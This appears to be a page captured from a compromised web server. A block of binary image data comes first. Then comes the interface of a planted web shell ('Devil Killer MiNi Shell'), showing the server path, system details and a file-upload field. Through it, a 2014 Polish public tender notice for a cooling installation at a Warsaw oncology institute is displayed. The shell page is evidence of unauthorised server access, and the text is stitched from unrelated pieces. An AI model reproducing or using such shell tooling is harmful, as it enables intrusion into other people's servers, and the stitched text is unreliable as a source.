JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140805/261050-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie instalacji wytwarzania chłodu  na potrzeby systemów wentylacji i klimatyzacji w  Centrum Onkologii-Instytut przy ul. Roentgena 5 w Warszawie, zgodnie z projektem technicznym. Demontaż i utylizacja starych agregatów</b><br>
<b>Numer ogłoszenia: 261050 - 2014; data zamieszczenia: 05.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Onkologii Instytut im. Marii Skłodowskiej-Curie , ul. W.K. Roentgena 5, 02-781 Warszawa, woj. mazowieckie, tel. 022 5462312, 5462872, faks 022 5462253, 5462872.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.coi.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie instalacji wytwarzania chłodu  na potrzeby systemów wentylacji i klimatyzacji w  Centrum Onkologii-Instytut przy ul. Roentgena 5 w Warszawie, zgodnie z projektem technicznym. Demontaż i utylizacja starych agregatów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonania instalacji wytwarzania chłodu na potrzeby systemu wentylacji i klimatyzacji Centrum Onkologii- Instytutu im. Marii Skłodowskiej-Curie w Warszawie przy ul. W.K. Roentgena 5 zgodnie z projektem technicznym - stanowiącym załącznik nr 8 do SIWZ.

Wskazane w projekcie technicznym nazwy handlowe lub własne projektowanych urządzeń do wytwarzania chłodu zostały podane w celu prawidłowego określenia przedmiotu zamówienia i służą ustaleniu oczekiwanych parametrów technicznych i funkcjonalnych. 
Zgodnie z art. 29 ust. 3 Prawo Zamówień Publicznych, Zamawiający dopuszcza składanie ofert równoważnych. 

Zaoferowane przez Wykonawcę równoważne zestawy urządzeń do wytwarzania chłodu   muszą odpowiadać wszystkim cechom technicznym, jakościowym i funkcjonalnym określonym w projekcie technicznym W celu udowodnienia równoważności Wykonawca załączy do oferty specyfikacje jakościowe, świadectwa kontroli jakości, katalogi oferowanych produktów, specyfikacje, karty charakterystyki lub inny równoważny dokument, który umożliwi porównanie urządzeń oferowanych z wymaganymi.

Wykonawca, który powołuje się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Pzp).

Ciężar dowodowy w zakresie udowodnienia równoważności zaoferowanych rozwiązań z rozwiązaniami opisanymi poprzez wskazanie przykładowego znaku towarowego, patentu lub pochodzenia, spoczywa na Wykonawcy, składającym ofertę równoważną.

1. Zakres prac obejmuje między innymi:

a) Wykonanie instalacji wytwarzania chłodu zgodnie z dokumentacją techniczną w systemie ( pod klucz) wraz z niezbędnymi uzgodnieniami, oraz uzyskanie w imieniu zamawiającego dopuszczenia do użytkowania instalacji i pozytywny odbiór przez UDT,

b) Przedstawienie do zaakceptowania przez Zamawiającego harmonogramu prowadzenia prac wraz z (kamieniami) milowymi opisanymi w pkt. VIII SIWZ,

c) Sporządzenie oraz przedstawienie do zaakceptowania przez Zamawiającego planu BIOZ dla wykonywanej instalacji według zasad określonych ustawą (Prawo Budowlane),

d) Wykonanie prac budowlanych zgodnie z projektem technicznym oraz przepisami ustawy (Prawo Budowlane),

e) Dostawa agregatów chłodniczych oraz wież chłodniczych zgodnie z projektem technicznym,
 
f) Dostawa komponentów instalacyjnych zgodnie z projektem technicznym, 

g) Wykonanie demontażu urządzeń oraz instalacji hydraulicznych w istniejącej maszynowni urządzeń chłodniczych wraz z ich utylizacją i dostarczeniem wymaganych świadectw potwierdzających wykonanie utylizacji przez firmę posiadającą uprawnienia do utylizacji odpadów uszkadzających warstwę ozonową,

h) Wykonanie instalacji AKPiA do nadzoru i kontroli parametrów pracy systemu wraz z instalacją zgodnie z projektem technicznym,

i) Dostawa, montaż, rozdzielnic elektrycznych zgodnie z dostarczonym przez COI projektem technicznym,

j)  Dostawa i instalacja kabli energetycznych zasilających od rozdzielnic do poszczególnych odbiorów zgodnie z projektem technicznym,

k) Uruchomienie wykonanej instalacji wytwarzania chłodu,

l) Przeprowadzenie wymaganych prób funkcjonalnych 72 godzinnych, pomiarów, badań podczas odbiorów robót, i przygotowanie dokumentów związanych z oddaniem do użytkowania instalacji,

m) Wykonanie i przekazanie Zamawiającemu dokumentacji powykonawczej z podziałem na branże,

n) Wykonanie i przekazanie Zamawiającemu audytu efektywności energetycznej wykonanej instalacji wytwarzania chłodu potwierdzającego uzyskanie deklarowany ESEERNET z karty katalogowej EUROVENT,

o) Przekazanie kompletu protokołów z pomiarów( elektryczne, sprawności chłodniczej układu, hałasu w odległości 10m, szczelności układu). Pomiary muszą być wykonane w obecności przedstawiciela Zamawiającego. Pomiary hałasu będą wykonane w godzinach wskazanych przez Zmawiającego. Zamawiający zastrzega sobie prawo do uczestniczenia w czasie wykonywania pomiarów przez Wykonawcę,
 
p) Wykonawca zapewni minimum 36-miesięczną gwarancję na zamontowane urządzenia i  wykonane roboty budowlane.  
 
2. W okresie gwarancji Wykonawca zobowiązuje się do wykonywania bezpłatnych serwisów zamontowanych urządzeń zgodnie z zaleceniami producenta i potrzebami wynikającymi z eksploatacji zamontowanych urządzeń oraz usuwania nieodpłatnie przyczyn awarii. W zakres serwisu oraz usuwania awarii wchodzą wszelkie niezbędne materiały i części zamienne, dojazd do Zamawiającego, wszelkie czynności serwisanta, itp. Czas reakcji w przypadkach zgłoszeń awaryjnych winien wynosić nie dłużej niż 4 godz. w dni świąteczne i porze nocnej, w godzinach pracy Zamawiającego 1 godzinę. 

3. Wykonawca zapewni rozruch urządzeń wraz z protokołami osiągniętych parametrów ich pracy oraz protokólarne przekazanie instalacji do użytkowania po 72 godzinnym rozruchu próbnym.

4. Wykonawca zapewni odbiory urządzeń i wyposażenia przez Urząd Dozoru Technicznego i innych służb, jeżeli wystąpi taka konieczność.

5. Organizacja prac na placu budowy będzie wymagała uzgodnień i koordynacji. Dlatego też strony ustalą osobę (Koordynatora) odpowiedzialnego za porządek na terenie inwestycji. 

6. Zamawiający zaleca, aby Wykonawca przed przygotowaniem i sporządzeniem oferty, we własnym zakresie, dla właściwego określenia koniecznych do wykonania prac i kalkulacji ceny dokonał wizji lokalnej w miejscu realizacji robót. Zgłoszenie o zamiarze zapoznania się z obiektem należy kierować do Andrzej Brudzyński tel: 22/ 546 - 23 -32, Marek Gajda tel. 22/ 546 - 23 - 33.

7. W przypadku realizacji przedmiotu zamówienia w czasie pracy istniejących urządzeń chłodniczych prowadzone prace nie mogą zakłócić i spowodować przerwanie ich pracy. 

Opis przedmiotu zamówienia został szczegółowo zawarty w Załączniku nr 8 do SIWZ, w skład którego wchodzą:
projekty techniczne, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót.

UWAGA: 
a)	ad. specyfikacji technicznej wykonania i odbioru robót poz. 3.1 (Dokumenty do złożenia wraz z ofertą), str. 5 - obowiązują zapisy SIWZ Rozdział VII i XVI niniejszej specyfikacji. 
b) ad. projektów technicznych: ze względu na niemożliwość zamieszczenia na naszej stronie internetowej ze względów na dużą ilość i problemy techniczne zamawiający na wniosek prześle płytę CD z projektami lub też będzie możliwy osobisty odbiór ul. Wawelska 15 b, 02-034 Warszawa, pokój 002 (parter).
c) UWAGA: kosztorys ofertowy, branża sanitarna poz. 34d.1 i poz. 35d.1: prawidłowa ilość to 2 szt. (poz. 34 d.1 - 2 szt., poz. 35d.1 - 2 szt.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 203.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 50.000,00 PLN (słownie: pięćdziesiąt tysięcy  00/100 PLN).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek : Posiadanie wiedzy i doświadczenia 
W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust.1pkt. 2  ustawy należy przedłożyć:

a)	wykaz wykonanych zamówień w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie i należycie ukończone. .Załącznik nr 3 do SIWZ;

b) Opis sposobu dokonania oceny tego warunku:

Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał zamówienia rodzajowo odpowiadające przedmiotowi zamówienia tj.:

- co najmniej jedno zamówienie na instalację wytwarzania wody ziębniczej (wody lodowej) opartą na pracy agregatów chłodniczych śrubowych chłodzonych cieczą z wieżami chłodniczymi o łącznej wydajności chłodniczej powyżej 1000 kW 

oraz

- co najmniej jedno zamówienie z zakresu instalacji AKPIA dla źródła chłodu o łącznej wydajności chłodniczej powyżej 1000 kW; 

o łącznej wartości minimum 2.000.000 zł brutto.

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków, przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust.1 pkt. 3  ustawy należy przedłożyć:

a) wykaz osób które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kontrole jakości oraz kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami 
- wg wzoru w załączniku nr 4 do SIWZ

b) Opis sposobu dokonania oceny tego warunku:

Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:

- co najmniej dwoma osobami posiadającymi uprawnienia potwierdzone
ważnym świadectwem kwalifikacji E do eksploatacji urządzeń, instalacji i sieci objętych przedmiotem zamówienia, w tym co najmniej jedną osobą posiadającą świadectwo kwalifikacji D, wynikającymi 
z zapisów ustawy z dnia 10 kwietnia 1997r. Prawo energetyczne (Dz. U. z 2006r. , nr 89, poz. 625 ze zm.);
- co najmniej jedną osobą posiadającą uprawnienia potwierdzone ważnym świadectwem kwalifikacji 
w zakresie naprawy i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane oraz obrotu tymi substancjami wynikającymi z ustawy z dnia 20 kwietnia 2004r. 
o substancjach zubożających warstwę ozonową (Dz. U. z 2004r., nr 121, poz. 1263 ze zm.);
-  co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności konstrukcyjno-budowlanej w rozumieniu przepisów ustawy z dnia 07.07.1994 r. Prawo Budowlane (Dz. U.z 2010 r., Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych 
w budownictwie (Dz. U. Nr 83, poz. 578) lub posiadający odpowiadające im ważne uprawnienia budowlane, jak też ważne stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, które zostały uzyskane na podstawie wcześniej obowiązujących przepisów albo którego odpowiednie kwalifikacje zawodowe zostały uznane 
na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4. Warunek: Posiadanie odpowiedniej zdolności finansowej i ekonomicznej

W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust.1
pkt. 4  ustawy należy przedłożyć:

a)	Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy podaną kwotą (liczba w PLN), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający wymaga wykazania posiadania środków lub zdolności kredytowej nie mniejszych niż 2.000.000,00 PLN. 
b)	opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości ubezpieczenia nie mniejszej niż 2.000.000 PLN

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków, przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">3.	Zamawiający wymaga załączenia do oferty:

a)	Zamawiający wymaga załączenia potwierdzonej za zgodność z oryginałem kopii karty katalogowej EUROVENT oferowanego agregatu chłodniczego.
b)	Zamawiający wymaga złożenia oświadczenia lub dokumentu potwierdzającego pomiar poziomu hałasu w odległości 10 m od ściany budynku w którym będzie zainstalowany agregat chłodniczy.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Zamawiający wymaga załączenia do oferty:

a)	Zamawiający wymaga załączenia potwierdzonej za zgodność z oryginałem kopii karty katalogowej EUROVENT oferowanego agregatu chłodniczego.
b)	Zamawiający wymaga złożenia oświadczenia lub dokumentu potwierdzającego pomiar poziomu hałasu w odległości 10 m od ściany budynku w którym będzie zainstalowany agregat chłodniczy.
c)	Upoważnienia do podpisania oferty i dokumentów przetargowych, a także składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wypisu z krajowego rejestru sądowego lub z centralnej ewidencji i informacji o działalności gospodarczej 
a)	Potwierdzenie wniesienia wadium.
b)	Wypełniony formularz ofertowy - załącznik nr 6 do SIWZ.

4.	Wykonawca wraz z oferta powinien złożyć wypełnione kosztorysy ofertowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - ESEER NET  oferowanych agregatów chłodniczych zgodnie z EUROVENT - 15</li>
<li>3 - deklarowana głośność zewnętrzna instalacji w odległości 10 m - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian umowy w przypadku, gdy konieczność ich wprowadzenia wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj.:
a) wystąpienia siły wyższej,
b) zmian funkcjonalnych lub organizacyjnych Zamawiającego lub Wykonawcy wpływających na realizację przedmiotu umowy,
c) zmiany podwykonawcy /-ów*,
* w przypadku wskazania w ofercie części zamówienia którą Wykonawca zamierza zlecić podwykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.coi.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Wawelska 15 b, 02 - 034 Warszawa w pokoju 002 (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2014 godzina 10:00, miejsce: ul. Wawelska 15 b, 02 - 034 Warszawa w pokoju 002 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





